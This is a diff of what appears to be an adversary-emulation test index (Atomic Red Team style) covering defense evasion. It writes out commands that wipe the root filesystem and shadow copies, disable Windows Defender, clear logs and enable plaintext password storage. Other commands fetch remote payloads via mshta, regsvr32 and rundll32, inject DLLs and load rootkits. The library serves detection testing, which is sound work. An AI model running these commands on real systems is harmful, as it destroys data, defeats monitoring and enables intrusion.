@@ -7273,11 +7273,11 @@ defense-evasion:
command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
-Name DisableAntiSpyware -Value 1
'
'
cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
Defender" -Name DisableAntiSpyware -Value 0
'
'
- name: Disable Microft Office Security Features
description: |
Gorgon group may disable Office security features so that their code can run
@@ -7311,7 +7311,7 @@ defense-evasion:
command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
-All
'
'
T1107:
technique:
x_mitre_data_sources:
@@ -7367,7 +7367,7 @@ defense-evasion:
- name: Delete a single file - Linux/macOS
description: 'Delete a single file from the temporary directory
'
'
supported_platforms:
- linux
- macos
@@ -7380,12 +7380,12 @@ defense-evasion:
name: sh
command: 'rm -f #{file_to_delete}
'
'
- name: Delete an entire folder - Linux/macOS
description: 'Recursively delete the temporary directory and all files contained
within it
'
'
supported_platforms:
- linux
- macos
@@ -7398,12 +7398,12 @@ defense-evasion:
name: sh
command: 'rm -rf #{folder_to_delete}
'
'
- name: Overwrite and delete a file with shred
description: 'Use the `shred` command to overwrite the temporary file and then
delete it
'
'
supported_platforms:
- linux
input_arguments:
@@ -7415,11 +7415,11 @@ defense-evasion:
name: sh
command: 'shred -u #{file_to_shred}
'
'
- name: Delete a single file - Windows cmd
description: 'Delete a single file from the temporary directory using cmd.exe
'
'
supported_platforms:
- windows
executor:
@@ -7432,7 +7432,7 @@ defense-evasion:
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
'
'
supported_platforms:
- windows
executor:
@@ -7444,7 +7444,7 @@ defense-evasion:
- name: Delete a single file - Windows PowerShell
description: 'Delete a single file from the temporary directory using Powershell
'
'
supported_platforms:
- windows
executor:
@@ -7457,7 +7457,7 @@ defense-evasion:
description: 'Recursively delete the temporary directory and all files contained
within it using Powershell
'
'
supported_platforms:
- windows
input_arguments:
@@ -7474,7 +7474,7 @@ defense-evasion:
- name: Delete VSS - vssadmin
description: 'Delete all volume shadow copies with vssadmin.exe
'
'
supported_platforms:
- windows
executor:
@@ -7482,11 +7482,11 @@ defense-evasion:
elevation_required: true
command: 'vssadmin.exe Delete Shadows /All /Quiet
'
'
- name: Delete VSS - wmic
description: 'Delete all volume shadow copies with wmic
'
'
supported_platforms:
- windows
executor:
@@ -7494,11 +7494,11 @@ defense-evasion:
elevation_required: true
command: 'wmic shadowcopy delete
'
'
- name: bcdedit
description: 'This test leverages `bcdedit` to remove boot-time recovery measures.
'
'
supported_platforms:
- windows
executor:
@@ -7510,7 +7510,7 @@ defense-evasion:
- name: wbadmin
description: 'This test deletes Windows Backup catalogs.
'
'
supported_platforms:
- windows
executor:
@@ -7518,25 +7518,25 @@ defense-evasion:
elevation_required: true
command: 'wbadmin delete catalog -quiet
'
'
- name: Delete Filesystem - Linux
description: 'This test deletes the entire root filesystem of a Linux system.
This technique was used by Amnesia IoT malware to avoid analysis. This test
is dangerous and destructive, do NOT use on production equipment.
'
'
supported_platforms:
- linux
executor:
name: bash
command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
'
'
- name: Delete-PrefetchFile
description: 'Delete a single prefetch file. Deletion of prefetch files is
a known anti-forensic technique.
'
'
supported_platforms:
- windows
executor:
@@ -7545,7 +7545,7 @@ defense-evasion:
command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
-Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
'
'
- name: Delete TeamViewer Log Files
description: |
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
@@ -7664,7 +7664,7 @@ defense-evasion:
description: 'Modifies the filesystem permissions of the specified file or folder
to take ownership of the object.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7676,12 +7676,12 @@ defense-evasion:
name: command_prompt
command: 'takeown.exe /f #{file_folder_to_own}
'
'
- name: Take ownership recursively using takeown utility
description: 'Modifies the filesystem permissions of the specified folder to
take ownership of it and its contents.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7693,12 +7693,12 @@ defense-evasion:
name: command_prompt
command: 'takeown.exe /f #{folder_to_own} /r
'
'
- name: cacls - Grant permission to specified user or group
description: 'Modifies the filesystem permissions of the specified file or folder
to allow the specified user or group Full Control.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7714,12 +7714,12 @@ defense-evasion:
name: command_prompt
command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F
'
'
- name: cacls - Grant permission to specified user or group recursively
description: 'Modifies the filesystem permissions of the specified folder and
contents to allow the specified user or group Full Control.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7735,12 +7735,12 @@ defense-evasion:
name: command_prompt
command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
'
'
- name: icacls - Grant permission to specified user or group
description: 'Modifies the filesystem permissions of the specified file or folder
to allow the specified user or group Full Control.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7756,12 +7756,12 @@ defense-evasion:
name: command_prompt
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
'
'
- name: icacls - Grant permission to specified user or group recursively
description: 'Modifies the filesystem permissions of the specified folder and
contents to allow the specified user or group Full Control.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7777,12 +7777,12 @@ defense-evasion:
name: command_prompt
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
'
'
- name: attrib - Remove read-only attribute
description: 'Removes the read-only attribute from a file or folder using the
attrib.exe command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7794,12 +7794,12 @@ defense-evasion:
name: command_prompt
command: 'attrib.exe -r #{file_or_folder}
'
'
- name: chmod - Change file or folder mode (numeric mode)
description: 'Changes a file or folder''s permissions using chmod and a specified
numeric mode.
'
'
supported_platforms:
- macos
- linux
@@ -7816,12 +7816,12 @@ defense-evasion:
name: bash
command: 'chmod #{numeric_mode} #{file_or_folder}
'
'
- name: chmod - Change file or folder mode (symbolic mode)
description: 'Changes a file or folder''s permissions using chmod and a specified
symbolic mode.
'
'
supported_platforms:
- macos
- linux
@@ -7838,12 +7838,12 @@ defense-evasion:
name: bash
command: 'chmod #{symbolic_mode} #{file_or_folder}
'
'
- name: chmod - Change file or folder mode (numeric mode) recursively
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified numeric mode.
'
'
supported_platforms:
- macos
- linux
@@ -7860,12 +7860,12 @@ defense-evasion:
name: bash
command: 'chmod #{numeric_mode} #{file_or_folder} -R
'
'
- name: chmod - Change file or folder mode (symbolic mode) recursively
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified symbolic mode.
'
'
supported_platforms:
- macos
- linux
@@ -7882,12 +7882,12 @@ defense-evasion:
name: bash
command: 'chmod #{symbolic_mode} #{file_or_folder} -R
'
'
- name: chown - Change file or folder ownership and group
description: 'Changes a file or folder''s ownership and group information using
chown.
'
'
supported_platforms:
- macos
- linux
@@ -7908,12 +7908,12 @@ defense-evasion:
name: bash
command: 'chown #{owner}:#{group} #{file_or_folder}
'
'
- name: chown - Change file or folder ownership and group recursively
description: 'Changes a file or folder''s ownership and group information recursively
using chown.
'
'
supported_platforms:
- macos
- linux
@@ -7934,11 +7934,11 @@ defense-evasion:
name: bash
command: 'chown #{owner}:#{group} #{file_or_folder} -R
'
'
- name: chown - Change file or folder mode ownership only
description: 'Changes a file or folder''s ownership only using chown.
'
'
supported_platforms:
- macos
- linux
@@ -7955,11 +7955,11 @@ defense-evasion:
name: bash
command: 'chown #{owner} #{file_or_folder}
'
'
- name: chown - Change file or folder ownership recursively
description: 'Changes a file or folder''s ownership only recursively using chown.
'
'
supported_platforms:
- macos
- linux
@@ -7976,7 +7976,7 @@ defense-evasion:
name: bash
command: 'chown #{owner} #{file_or_folder} -R
'
'
- name: chattr - Remove immutable file attribute
description: |
Remove's a file's `immutable` attribute using `chattr`.
@@ -7993,7 +7993,7 @@ defense-evasion:
name: sh
command: 'chattr -i #{file_to_modify}
'
'
T1144:
technique:
x_mitre_permissions_required:
@@ -8072,7 +8072,7 @@ defense-evasion:
- name: Gatekeeper Bypass
description: 'Gatekeeper Bypass via command line
'
'
supported_platforms:
- macos
input_arguments:
@@ -8136,7 +8136,7 @@ defense-evasion:
- name: Disable history collection
description: 'Disables history collection in shells
'
'
supported_platforms:
- linux
- macos
@@ -8231,7 +8231,7 @@ defense-evasion:
- name: Create a hidden file in a hidden directory
description: 'Creates a hidden file inside a hidden directory
'
'
supported_platforms:
- linux
- macos
@@ -8243,11 +8243,11 @@ defense-evasion:
echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
'
'
- name: Mac Hidden file
description: 'Hide a file on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -8256,12 +8256,12 @@ defense-evasion:
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
40 00 FF FF FF FF 00 00"
'
'
- name: Create Windows System File with Attrib
description: 'Creates a file and marks it as a system file using the attrib.exe
utility.
'
'
supported_platforms:
- windows
executor:
@@ -8272,11 +8272,11 @@ defense-evasion:
attrib.exe +s %TEMP%\T1158.txt
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
'
'
- name: Create Windows Hidden File with Attrib
description: 'Creates a file and marks it as hidden using the attrib.exe utility.
'
'
supported_platforms:
- windows
executor:
@@ -8287,11 +8287,11 @@ defense-evasion:
attrib.exe +h %TEMP%\T1158_hidden.txt
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
'
'
- name: Hidden files
description: 'Requires Apple Dev Tools
'
'
supported_platforms:
- macos
input_arguments:
@@ -8304,11 +8304,11 @@ defense-evasion:
elevation_required: false
command: 'setfile -a V #(unknown)
'
'
- name: Hide a Directory
description: 'Hide a directory on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -8319,11 +8319,11 @@ defense-evasion:
chflags hidden /var/tmp/T1158_mac.txt
cleanup_command: 'rm /var/tmp/T1158_mac.txt
'
'
- name: Show all hidden files
description: 'Show all hidden files on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -8331,15 +8331,15 @@ defense-evasion:
elevation_required: false
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
'
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
'
'
- name: Create ADS command prompt
description: 'Create an Alternate Data Stream with the command prompt. Write
access is required.
'
'
supported_platforms:
- windows
input_arguments:
@@ -8357,15 +8357,15 @@ defense-evasion:
command: |
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name} >nul 2>&1
'
'
- name: Create ADS PowerShell
description: 'Create an Alternate Data Stream with PowerShell. Write access
is required.
'
'
supported_platforms:
- windows
input_arguments:
@@ -8387,7 +8387,7 @@ defense-evasion:
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
'
'
T1147:
technique:
x_mitre_data_sources:
@@ -8435,7 +8435,7 @@ defense-evasion:
- name: Hidden Users
description: 'Add a hidden user on MacOS
'
'
supported_platforms:
- macos
input_arguments:
@@ -8447,7 +8447,7 @@ defense-evasion:
name: sh
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
'
'
T1143:
technique:
x_mitre_permissions_required:
@@ -8507,7 +8507,7 @@ defense-evasion:
description: 'Launch PowerShell with the "-WindowStyle Hidden" argument to conceal
PowerShell windows by setting the WindowStyle parameter to hidden.
'
'
supported_platforms:
- windows
input_arguments:
@@ -8524,7 +8524,7 @@ defense-evasion:
elevation_required: false
command: 'Start-Process #{powershell_command}
'
'
T1183:
technique:
x_mitre_data_sources:
@@ -8614,7 +8614,7 @@ defense-evasion:
- name: IFEO Add Debugger
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -8632,15 +8632,15 @@ defense-evasion:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
'
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /f
'
'
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -8744,7 +8744,7 @@ defense-evasion:
- name: Clear Logs
description: 'Clear Windows Event Logs
'
'
supported_platforms:
- windows
input_arguments:
@@ -8757,12 +8757,12 @@ defense-evasion:
elevation_required: true
command: 'wevtutil cl #{log_name}
'
'
- name: FSUtil
description: 'Manages the update sequence number (USN) change journal, which
provides a persistent log of all changes made to files on the volume.
'
'
supported_platforms:
- windows
executor:
@@ -8770,11 +8770,11 @@ defense-evasion:
elevation_required: true
command: 'fsutil usn deletejournal /D C:
'
'
- name: rm -rf
description: 'Delete system and audit logs
'
'
supported_platforms:
- macos
- linux
@@ -8788,7 +8788,7 @@ defense-evasion:
This technique was used by threat actor Rocke during the exploitation of Linux
web servers.
'
'
supported_platforms:
- linux
input_arguments:
@@ -8800,12 +8800,12 @@ defense-evasion:
name: bash
command: 'echo 0> /var/spool/mail/#{username}
'
'
- name: Overwrite Linux Log
description: 'This test overwrites the specified log. This technique was used
by threat actor Rocke during the exploitation of Linux web servers.
'
'
supported_platforms:
- linux
input_arguments:
@@ -8817,12 +8817,12 @@ defense-evasion:
name: bash
command: 'echo 0> #{log_path}
'
'
- name: Delete System Logs Using PowerShell
description: 'Recommended Detection: Monitor for use of the windows event log
filepath in PowerShell couple with delete arguments
'
'
supported_platforms:
- windows
executor:
@@ -8834,11 +8834,11 @@ defense-evasion:
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
cleanup_command: 'Start-Service -Name EventLog
'
'
- name: Delete System Logs Using Clear-EventLogId
description: 'Clear event logs using built-in PowerShell commands
'
'
supported_platforms:
- windows
executor:
@@ -8846,7 +8846,7 @@ defense-evasion:
elevation_required: true
command: 'Clear-EventLog -logname Application
'
'
T1202:
technique:
x_mitre_data_sources:
@@ -9042,7 +9042,7 @@ defense-evasion:
- name: Install root CA on CentOS/RHEL
description: 'Creates a root CA with openssl
'
'
supported_platforms:
- linux
input_arguments:
@@ -9124,7 +9124,7 @@ defense-evasion:
description: 'Executes the CheckIfInstallable class constructor runner instead
of executing InstallUtil.
'
'
supported_platforms:
- windows
input_arguments:
@@ -9190,7 +9190,7 @@ defense-evasion:
description: 'Executes the InstallHelper class constructor runner instead of
executing InstallUtil.
'
'
supported_platforms:
- windows
input_arguments:
@@ -9257,7 +9257,7 @@ defense-evasion:
- name: InstallUtil class constructor method call
description: 'Executes the installer assembly class constructor.
'
'
supported_platforms:
- windows
input_arguments:
@@ -9324,7 +9324,7 @@ defense-evasion:
- name: InstallUtil Install method call
description: 'Executes the Install Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -9391,7 +9391,7 @@ defense-evasion:
- name: InstallUtil Uninstall method call - /U variant
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -9459,7 +9459,7 @@ defense-evasion:
variant
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -9526,7 +9526,7 @@ defense-evasion:
- name: InstallUtil HelpText method call
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -9594,7 +9594,7 @@ defense-evasion:
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
using a nonstandard extension for the assembly.
'
'
supported_platforms:
- windows
input_arguments:
@@ -9711,14 +9711,14 @@ defense-evasion:
- name: Launchctl
description: 'Utilize launchctl
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
'
T1036:
technique:
x_mitre_data_sources:
@@ -9833,7 +9833,7 @@ defense-evasion:
description: 'Copies cmd.exe, renames it, and launches it to masquerade as an
instance of lsass.exe.
'
'
supported_platforms:
- windows
executor:
@@ -9844,12 +9844,12 @@ defense-evasion:
cmd.exe /c %SystemRoot%\Temp\lsass.exe
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
'
'
- name: Masquerading as Linux crond process.
description: 'Copies sh process, renames it as crond, and executes it to masquerade
as the cron daemon.
'
'
supported_platforms:
- linux
executor:
@@ -9862,7 +9862,7 @@ defense-evasion:
description: 'Copies cscript.exe, renames it, and launches it to masquerade
as an instance of notepad.exe.
'
'
supported_platforms:
- windows
executor:
@@ -9873,12 +9873,12 @@ defense-evasion:
cmd.exe /c %APPDATA%\notepad.exe /B
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
'
'
- name: Masquerading - wscript.exe running as svchost.exe
description: 'Copies wscript.exe, renames it, and launches it to masquerade
as an instance of svchost.exe.
'
'
supported_platforms:
- windows
executor:
@@ -9889,12 +9889,12 @@ defense-evasion:
cmd.exe /c %APPDATA%\svchost.exe /B
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
'
'
- name: Masquerading - powershell.exe running as taskhostw.exe
description: 'Copies powershell.exe, renames it, and launches it to masquerade
as an instance of taskhostw.exe.
'
'
supported_platforms:
- windows
executor:
@@ -9905,12 +9905,12 @@ defense-evasion:
cmd.exe /K %APPDATA%\taskhostw.exe
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
'
'
- name: Masquerading - non-windows exe running as windows exe
description: 'Copies an exe, renames it as a windows exe, and launches it to
masquerade as a real windows exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -9938,12 +9938,12 @@ defense-evasion:
Stop-Process -ID $myT1036
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
'
'
- name: Masquerading - windows exe running as different windows exe
description: 'Copies a windows exe, renames it as another windows exe, and launches
it to masquerade as second windows exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -9964,7 +9964,7 @@ defense-evasion:
Stop-Process -ID $myT1036
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
'
'
- name: Malicious process Masquerading as LSM.exe
description: |
Detect LSM running from an incorrect directory and an incorrect service account
@@ -10066,7 +10066,7 @@ defense-evasion:
description: 'Modify the registry of the currently logged in user using reg.exe
cia cmd console
'
'
supported_platforms:
- windows
executor:
@@ -10075,11 +10075,11 @@ defense-evasion:
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
'
'
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/v HideFileExt /f
'
'
- name: Modify Registry of Local Machine - cmd
description: |
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
@@ -10092,16 +10092,16 @@ defense-evasion:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
'
'
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/v SecurityHealth /f
'
'
- name: Modify Registry of Another User Profile
description: 'Modify a registry key of each user profile not currently loaded
on the machine using both powershell and cmd line tools.
'
'
supported_platforms:
- windows
executor:
@@ -10164,7 +10164,7 @@ defense-evasion:
description: 'Sets registry key that will tell windows to store plaintext passwords
(making the system vulnerable to clear text / cleartext password dumping)
'
'
supported_platforms:
- windows
executor:
@@ -10173,16 +10173,16 @@ defense-evasion:
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1 /f
'
'
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 0 /f
'
'
- name: Modify registry to store PowerShell code
description: 'Sets Windows Registry key containing base64-encoded PowerShell
code.
'
'
supported_platforms:
- windows
input_arguments:
@@ -10210,7 +10210,7 @@ defense-evasion:
cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage}
-Name #{registry_entry_storage} -ErrorAction Ignore
'
'
- name: Add domain to Trusted sites Zone
description: |
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
@@ -10233,7 +10233,7 @@ defense-evasion:
- name: Javascript in registry
description: 'placing javascript in registry for persistence
'
'
supported_platforms:
- windows
executor:
@@ -10242,7 +10242,7 @@ defense-evasion:
command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -Value "<script>"
'
'
cleanup_command: Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -ErrorAction Ignore
T1170:
@@ -10336,7 +10336,7 @@ defense-evasion:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: 'Test execution of a remote script using mshta.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -10363,7 +10363,7 @@ defense-evasion:
name: command_prompt
command: 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""{local_file_path}"")(window.close)")
'
'
- name: Mshta executes VBScript to execute malicious command
description: |
Run a local VB script to run local user enumeration powershell command
@@ -10376,11 +10376,11 @@ defense-evasion:
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
-noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
'
'
- name: Mshta Executes Remote HTML Application (HTA)
description: 'Execute an arbitrary remote HTA.
'
'
supported_platforms:
- windows
input_arguments:
@@ -10400,7 +10400,7 @@ defense-evasion:
mshta "#{temp_file}"
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
'
'
T1096:
technique:
x_mitre_data_sources:
@@ -10515,7 +10515,7 @@ defense-evasion:
description: 'Storing files in Alternate Data Stream (ADS) similar to Astaroth
malware.
'
'
supported_platforms:
- windows
input_arguments:
@@ -10596,7 +10596,7 @@ defense-evasion:
- name: Add Network Share
description: 'Add a Network Share utilizing the command_prompt
'
'
supported_platforms:
- windows
input_arguments:
@@ -10613,7 +10613,7 @@ defense-evasion:
- name: Remove Network Share
description: 'Removes a Network Share utilizing the command_prompt
'
'
supported_platforms:
- windows
input_arguments:
@@ -10626,11 +10626,11 @@ defense-evasion:
elevation_required: false
command: 'net share #{share_name} /delete
'
'
- name: Remove Network Share PowerShell
description: 'Removes a Network Share utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -10757,7 +10757,7 @@ defense-evasion:
description: 'Creates a base64-encoded data file and decodes it into an executable
shell script
'
'
supported_platforms:
- macos
- linux
@@ -10773,7 +10773,7 @@ defense-evasion:
description: 'Creates base64-encoded PowerShell code and executes it. This is
used by numerous adversaries and malicious tools.
'
'
supported_platforms:
- windows
input_arguments:
@@ -10796,7 +10796,7 @@ defense-evasion:
and deobfuscates it for execution. This is used by numerous adversaries and
malicious tools.
'
'
supported_platforms:
- windows
input_arguments:
@@ -11003,7 +11003,7 @@ defense-evasion:
- name: Plist Modification
description: 'Modify MacOS plist file in one of two directories
'
'
supported_platforms:
- macos
executor:
@@ -11257,7 +11257,7 @@ defense-evasion:
- name: Process Injection via mavinject.exe
description: 'Windows 10 Utility To Inject DLLS
'
'
supported_platforms:
- windows
input_arguments:
@@ -11285,7 +11285,7 @@ defense-evasion:
- name: Process Injection via PowerSploit
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
'
'
supported_platforms:
- windows
input_arguments:
@@ -11320,13 +11320,13 @@ defense-evasion:
elevation_required: true
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
'
'
- name: Shared Library Injection via LD_PRELOAD
description: 'This test injects a shared object library via the LD_PRELOAD environment
variable to execute. This technique was used by threat actor Rocke during
the exploitation of Linux web servers. This requires the `glibc` package.
'
'
supported_platforms:
- linux
input_arguments:
@@ -11339,7 +11339,7 @@ defense-evasion:
elevation_required: false
command: 'LD_PRELOAD=#{path_to_shared_library} ls
'
'
- name: Process Injection via C#
description: |
Process Injection using C#
@@ -11438,7 +11438,7 @@ defense-evasion:
- name: Regasm Uninstall Method Call Test
description: 'Executes the Uninstall Method, No Admin Rights Required
'
'
supported_platforms:
- windows
input_arguments:
@@ -11466,12 +11466,12 @@ defense-evasion:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
cleanup_command: 'del #{output_file} >nul 2>&1
'
'
- name: Regsvs Uninstall Method Call Test
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
SNK
'
'
supported_platforms:
- windows
input_arguments:
@@ -11579,7 +11579,7 @@ defense-evasion:
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -11599,12 +11599,12 @@ defense-evasion:
elevation_required: false
command: 'regsvr32.exe /s /u /i:#(unknown) scrobj.dll
'
'
- name: Regsvr32 remote COM scriptlet execution
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -11617,12 +11617,12 @@ defense-evasion:
elevation_required: false
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
'
'
- name: Regsvr32 local DLL execution
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -11644,7 +11644,7 @@ defense-evasion:
command: '"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
'
'
T1014:
technique:
x_mitre_data_sources:
@@ -11715,7 +11715,7 @@ defense-evasion:
- name: Loadable Kernel Module based Rootkit
description: 'Loadable Kernel Module based Rootkit
'
'
supported_platforms:
- linux
input_arguments:
@@ -11727,11 +11727,11 @@ defense-evasion:
name: sh
command: 'sudo insmod #{rootkit_file}
'
'
- name: Loadable Kernel Module based Rootkit
description: 'Loadable Kernel Module based Rootkit
'
'
supported_platforms:
- linux
input_arguments:
@@ -11743,7 +11743,7 @@ defense-evasion:
name: sh
command: 'sudo modprobe #{rootkit_file}
'
'
- name: Windows Signed Driver Rootkit Test
description: |
This test exploits a signed driver to execute code in Kernel.
@@ -11765,7 +11765,7 @@ defense-evasion:
name: command_prompt
command: 'puppetstrings #{driver_path}
'
'
T1085:
technique:
x_mitre_data_sources:
@@ -11828,7 +11828,7 @@ defense-evasion:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: 'Test execution of a remote script using rundll32.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -11841,7 +11841,7 @@ defense-evasion:
elevation_required: false
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
'
'
- name: Rundll32 execute VBscript command
description: |
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
@@ -11859,7 +11859,7 @@ defense-evasion:
elevation_required: false
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
'
'
- name: Rundll32 advpack.dll Execution
description: |
Test execution of a command using rundll32.exe with advpack.dll.
@@ -11884,7 +11884,7 @@ defense-evasion:
elevation_required: false
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
'
'
- name: Rundll32 ieadvpack.dll Execution
description: |
Test execution of a command using rundll32.exe with ieadvpack.dll.
@@ -11909,7 +11909,7 @@ defense-evasion:
elevation_required: false
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
'
'
- name: Rundll32 syssetup.dll Execution
description: |
Test execution of a command using rundll32.exe with syssetup.dll.
@@ -11935,7 +11935,7 @@ defense-evasion:
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
128 .\#{inf_to_execute}
'
'
- name: Rundll32 setupapi.dll Execution
description: |
Test execution of a command using rundll32.exe with setupapi.dll.
@@ -11961,7 +11961,7 @@ defense-evasion:
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
.\#{inf_to_execute}
'
'
T1064:
technique:
x_mitre_permissions_required:
@@ -12030,7 +12030,7 @@ defense-evasion:
- name: Create and Execute Bash Shell Script
description: 'Creates and executes a simple bash script.
'
'
supported_platforms:
- macos
- linux
@@ -12045,7 +12045,7 @@ defense-evasion:
- name: Create and Execute Batch Script
description: 'Creates and executes a simple batch script.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12065,7 +12065,7 @@ defense-evasion:
\n"
cleanup_command: 'del #{script_to_create} >nul 2>&1
'
'
T1218:
technique:
x_mitre_data_sources:
@@ -12179,7 +12179,7 @@ defense-evasion:
description: 'Injects arbitrary DLL into running process specified by process
ID. Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12203,12 +12203,12 @@ defense-evasion:
elevation_required: true
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
'
'
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
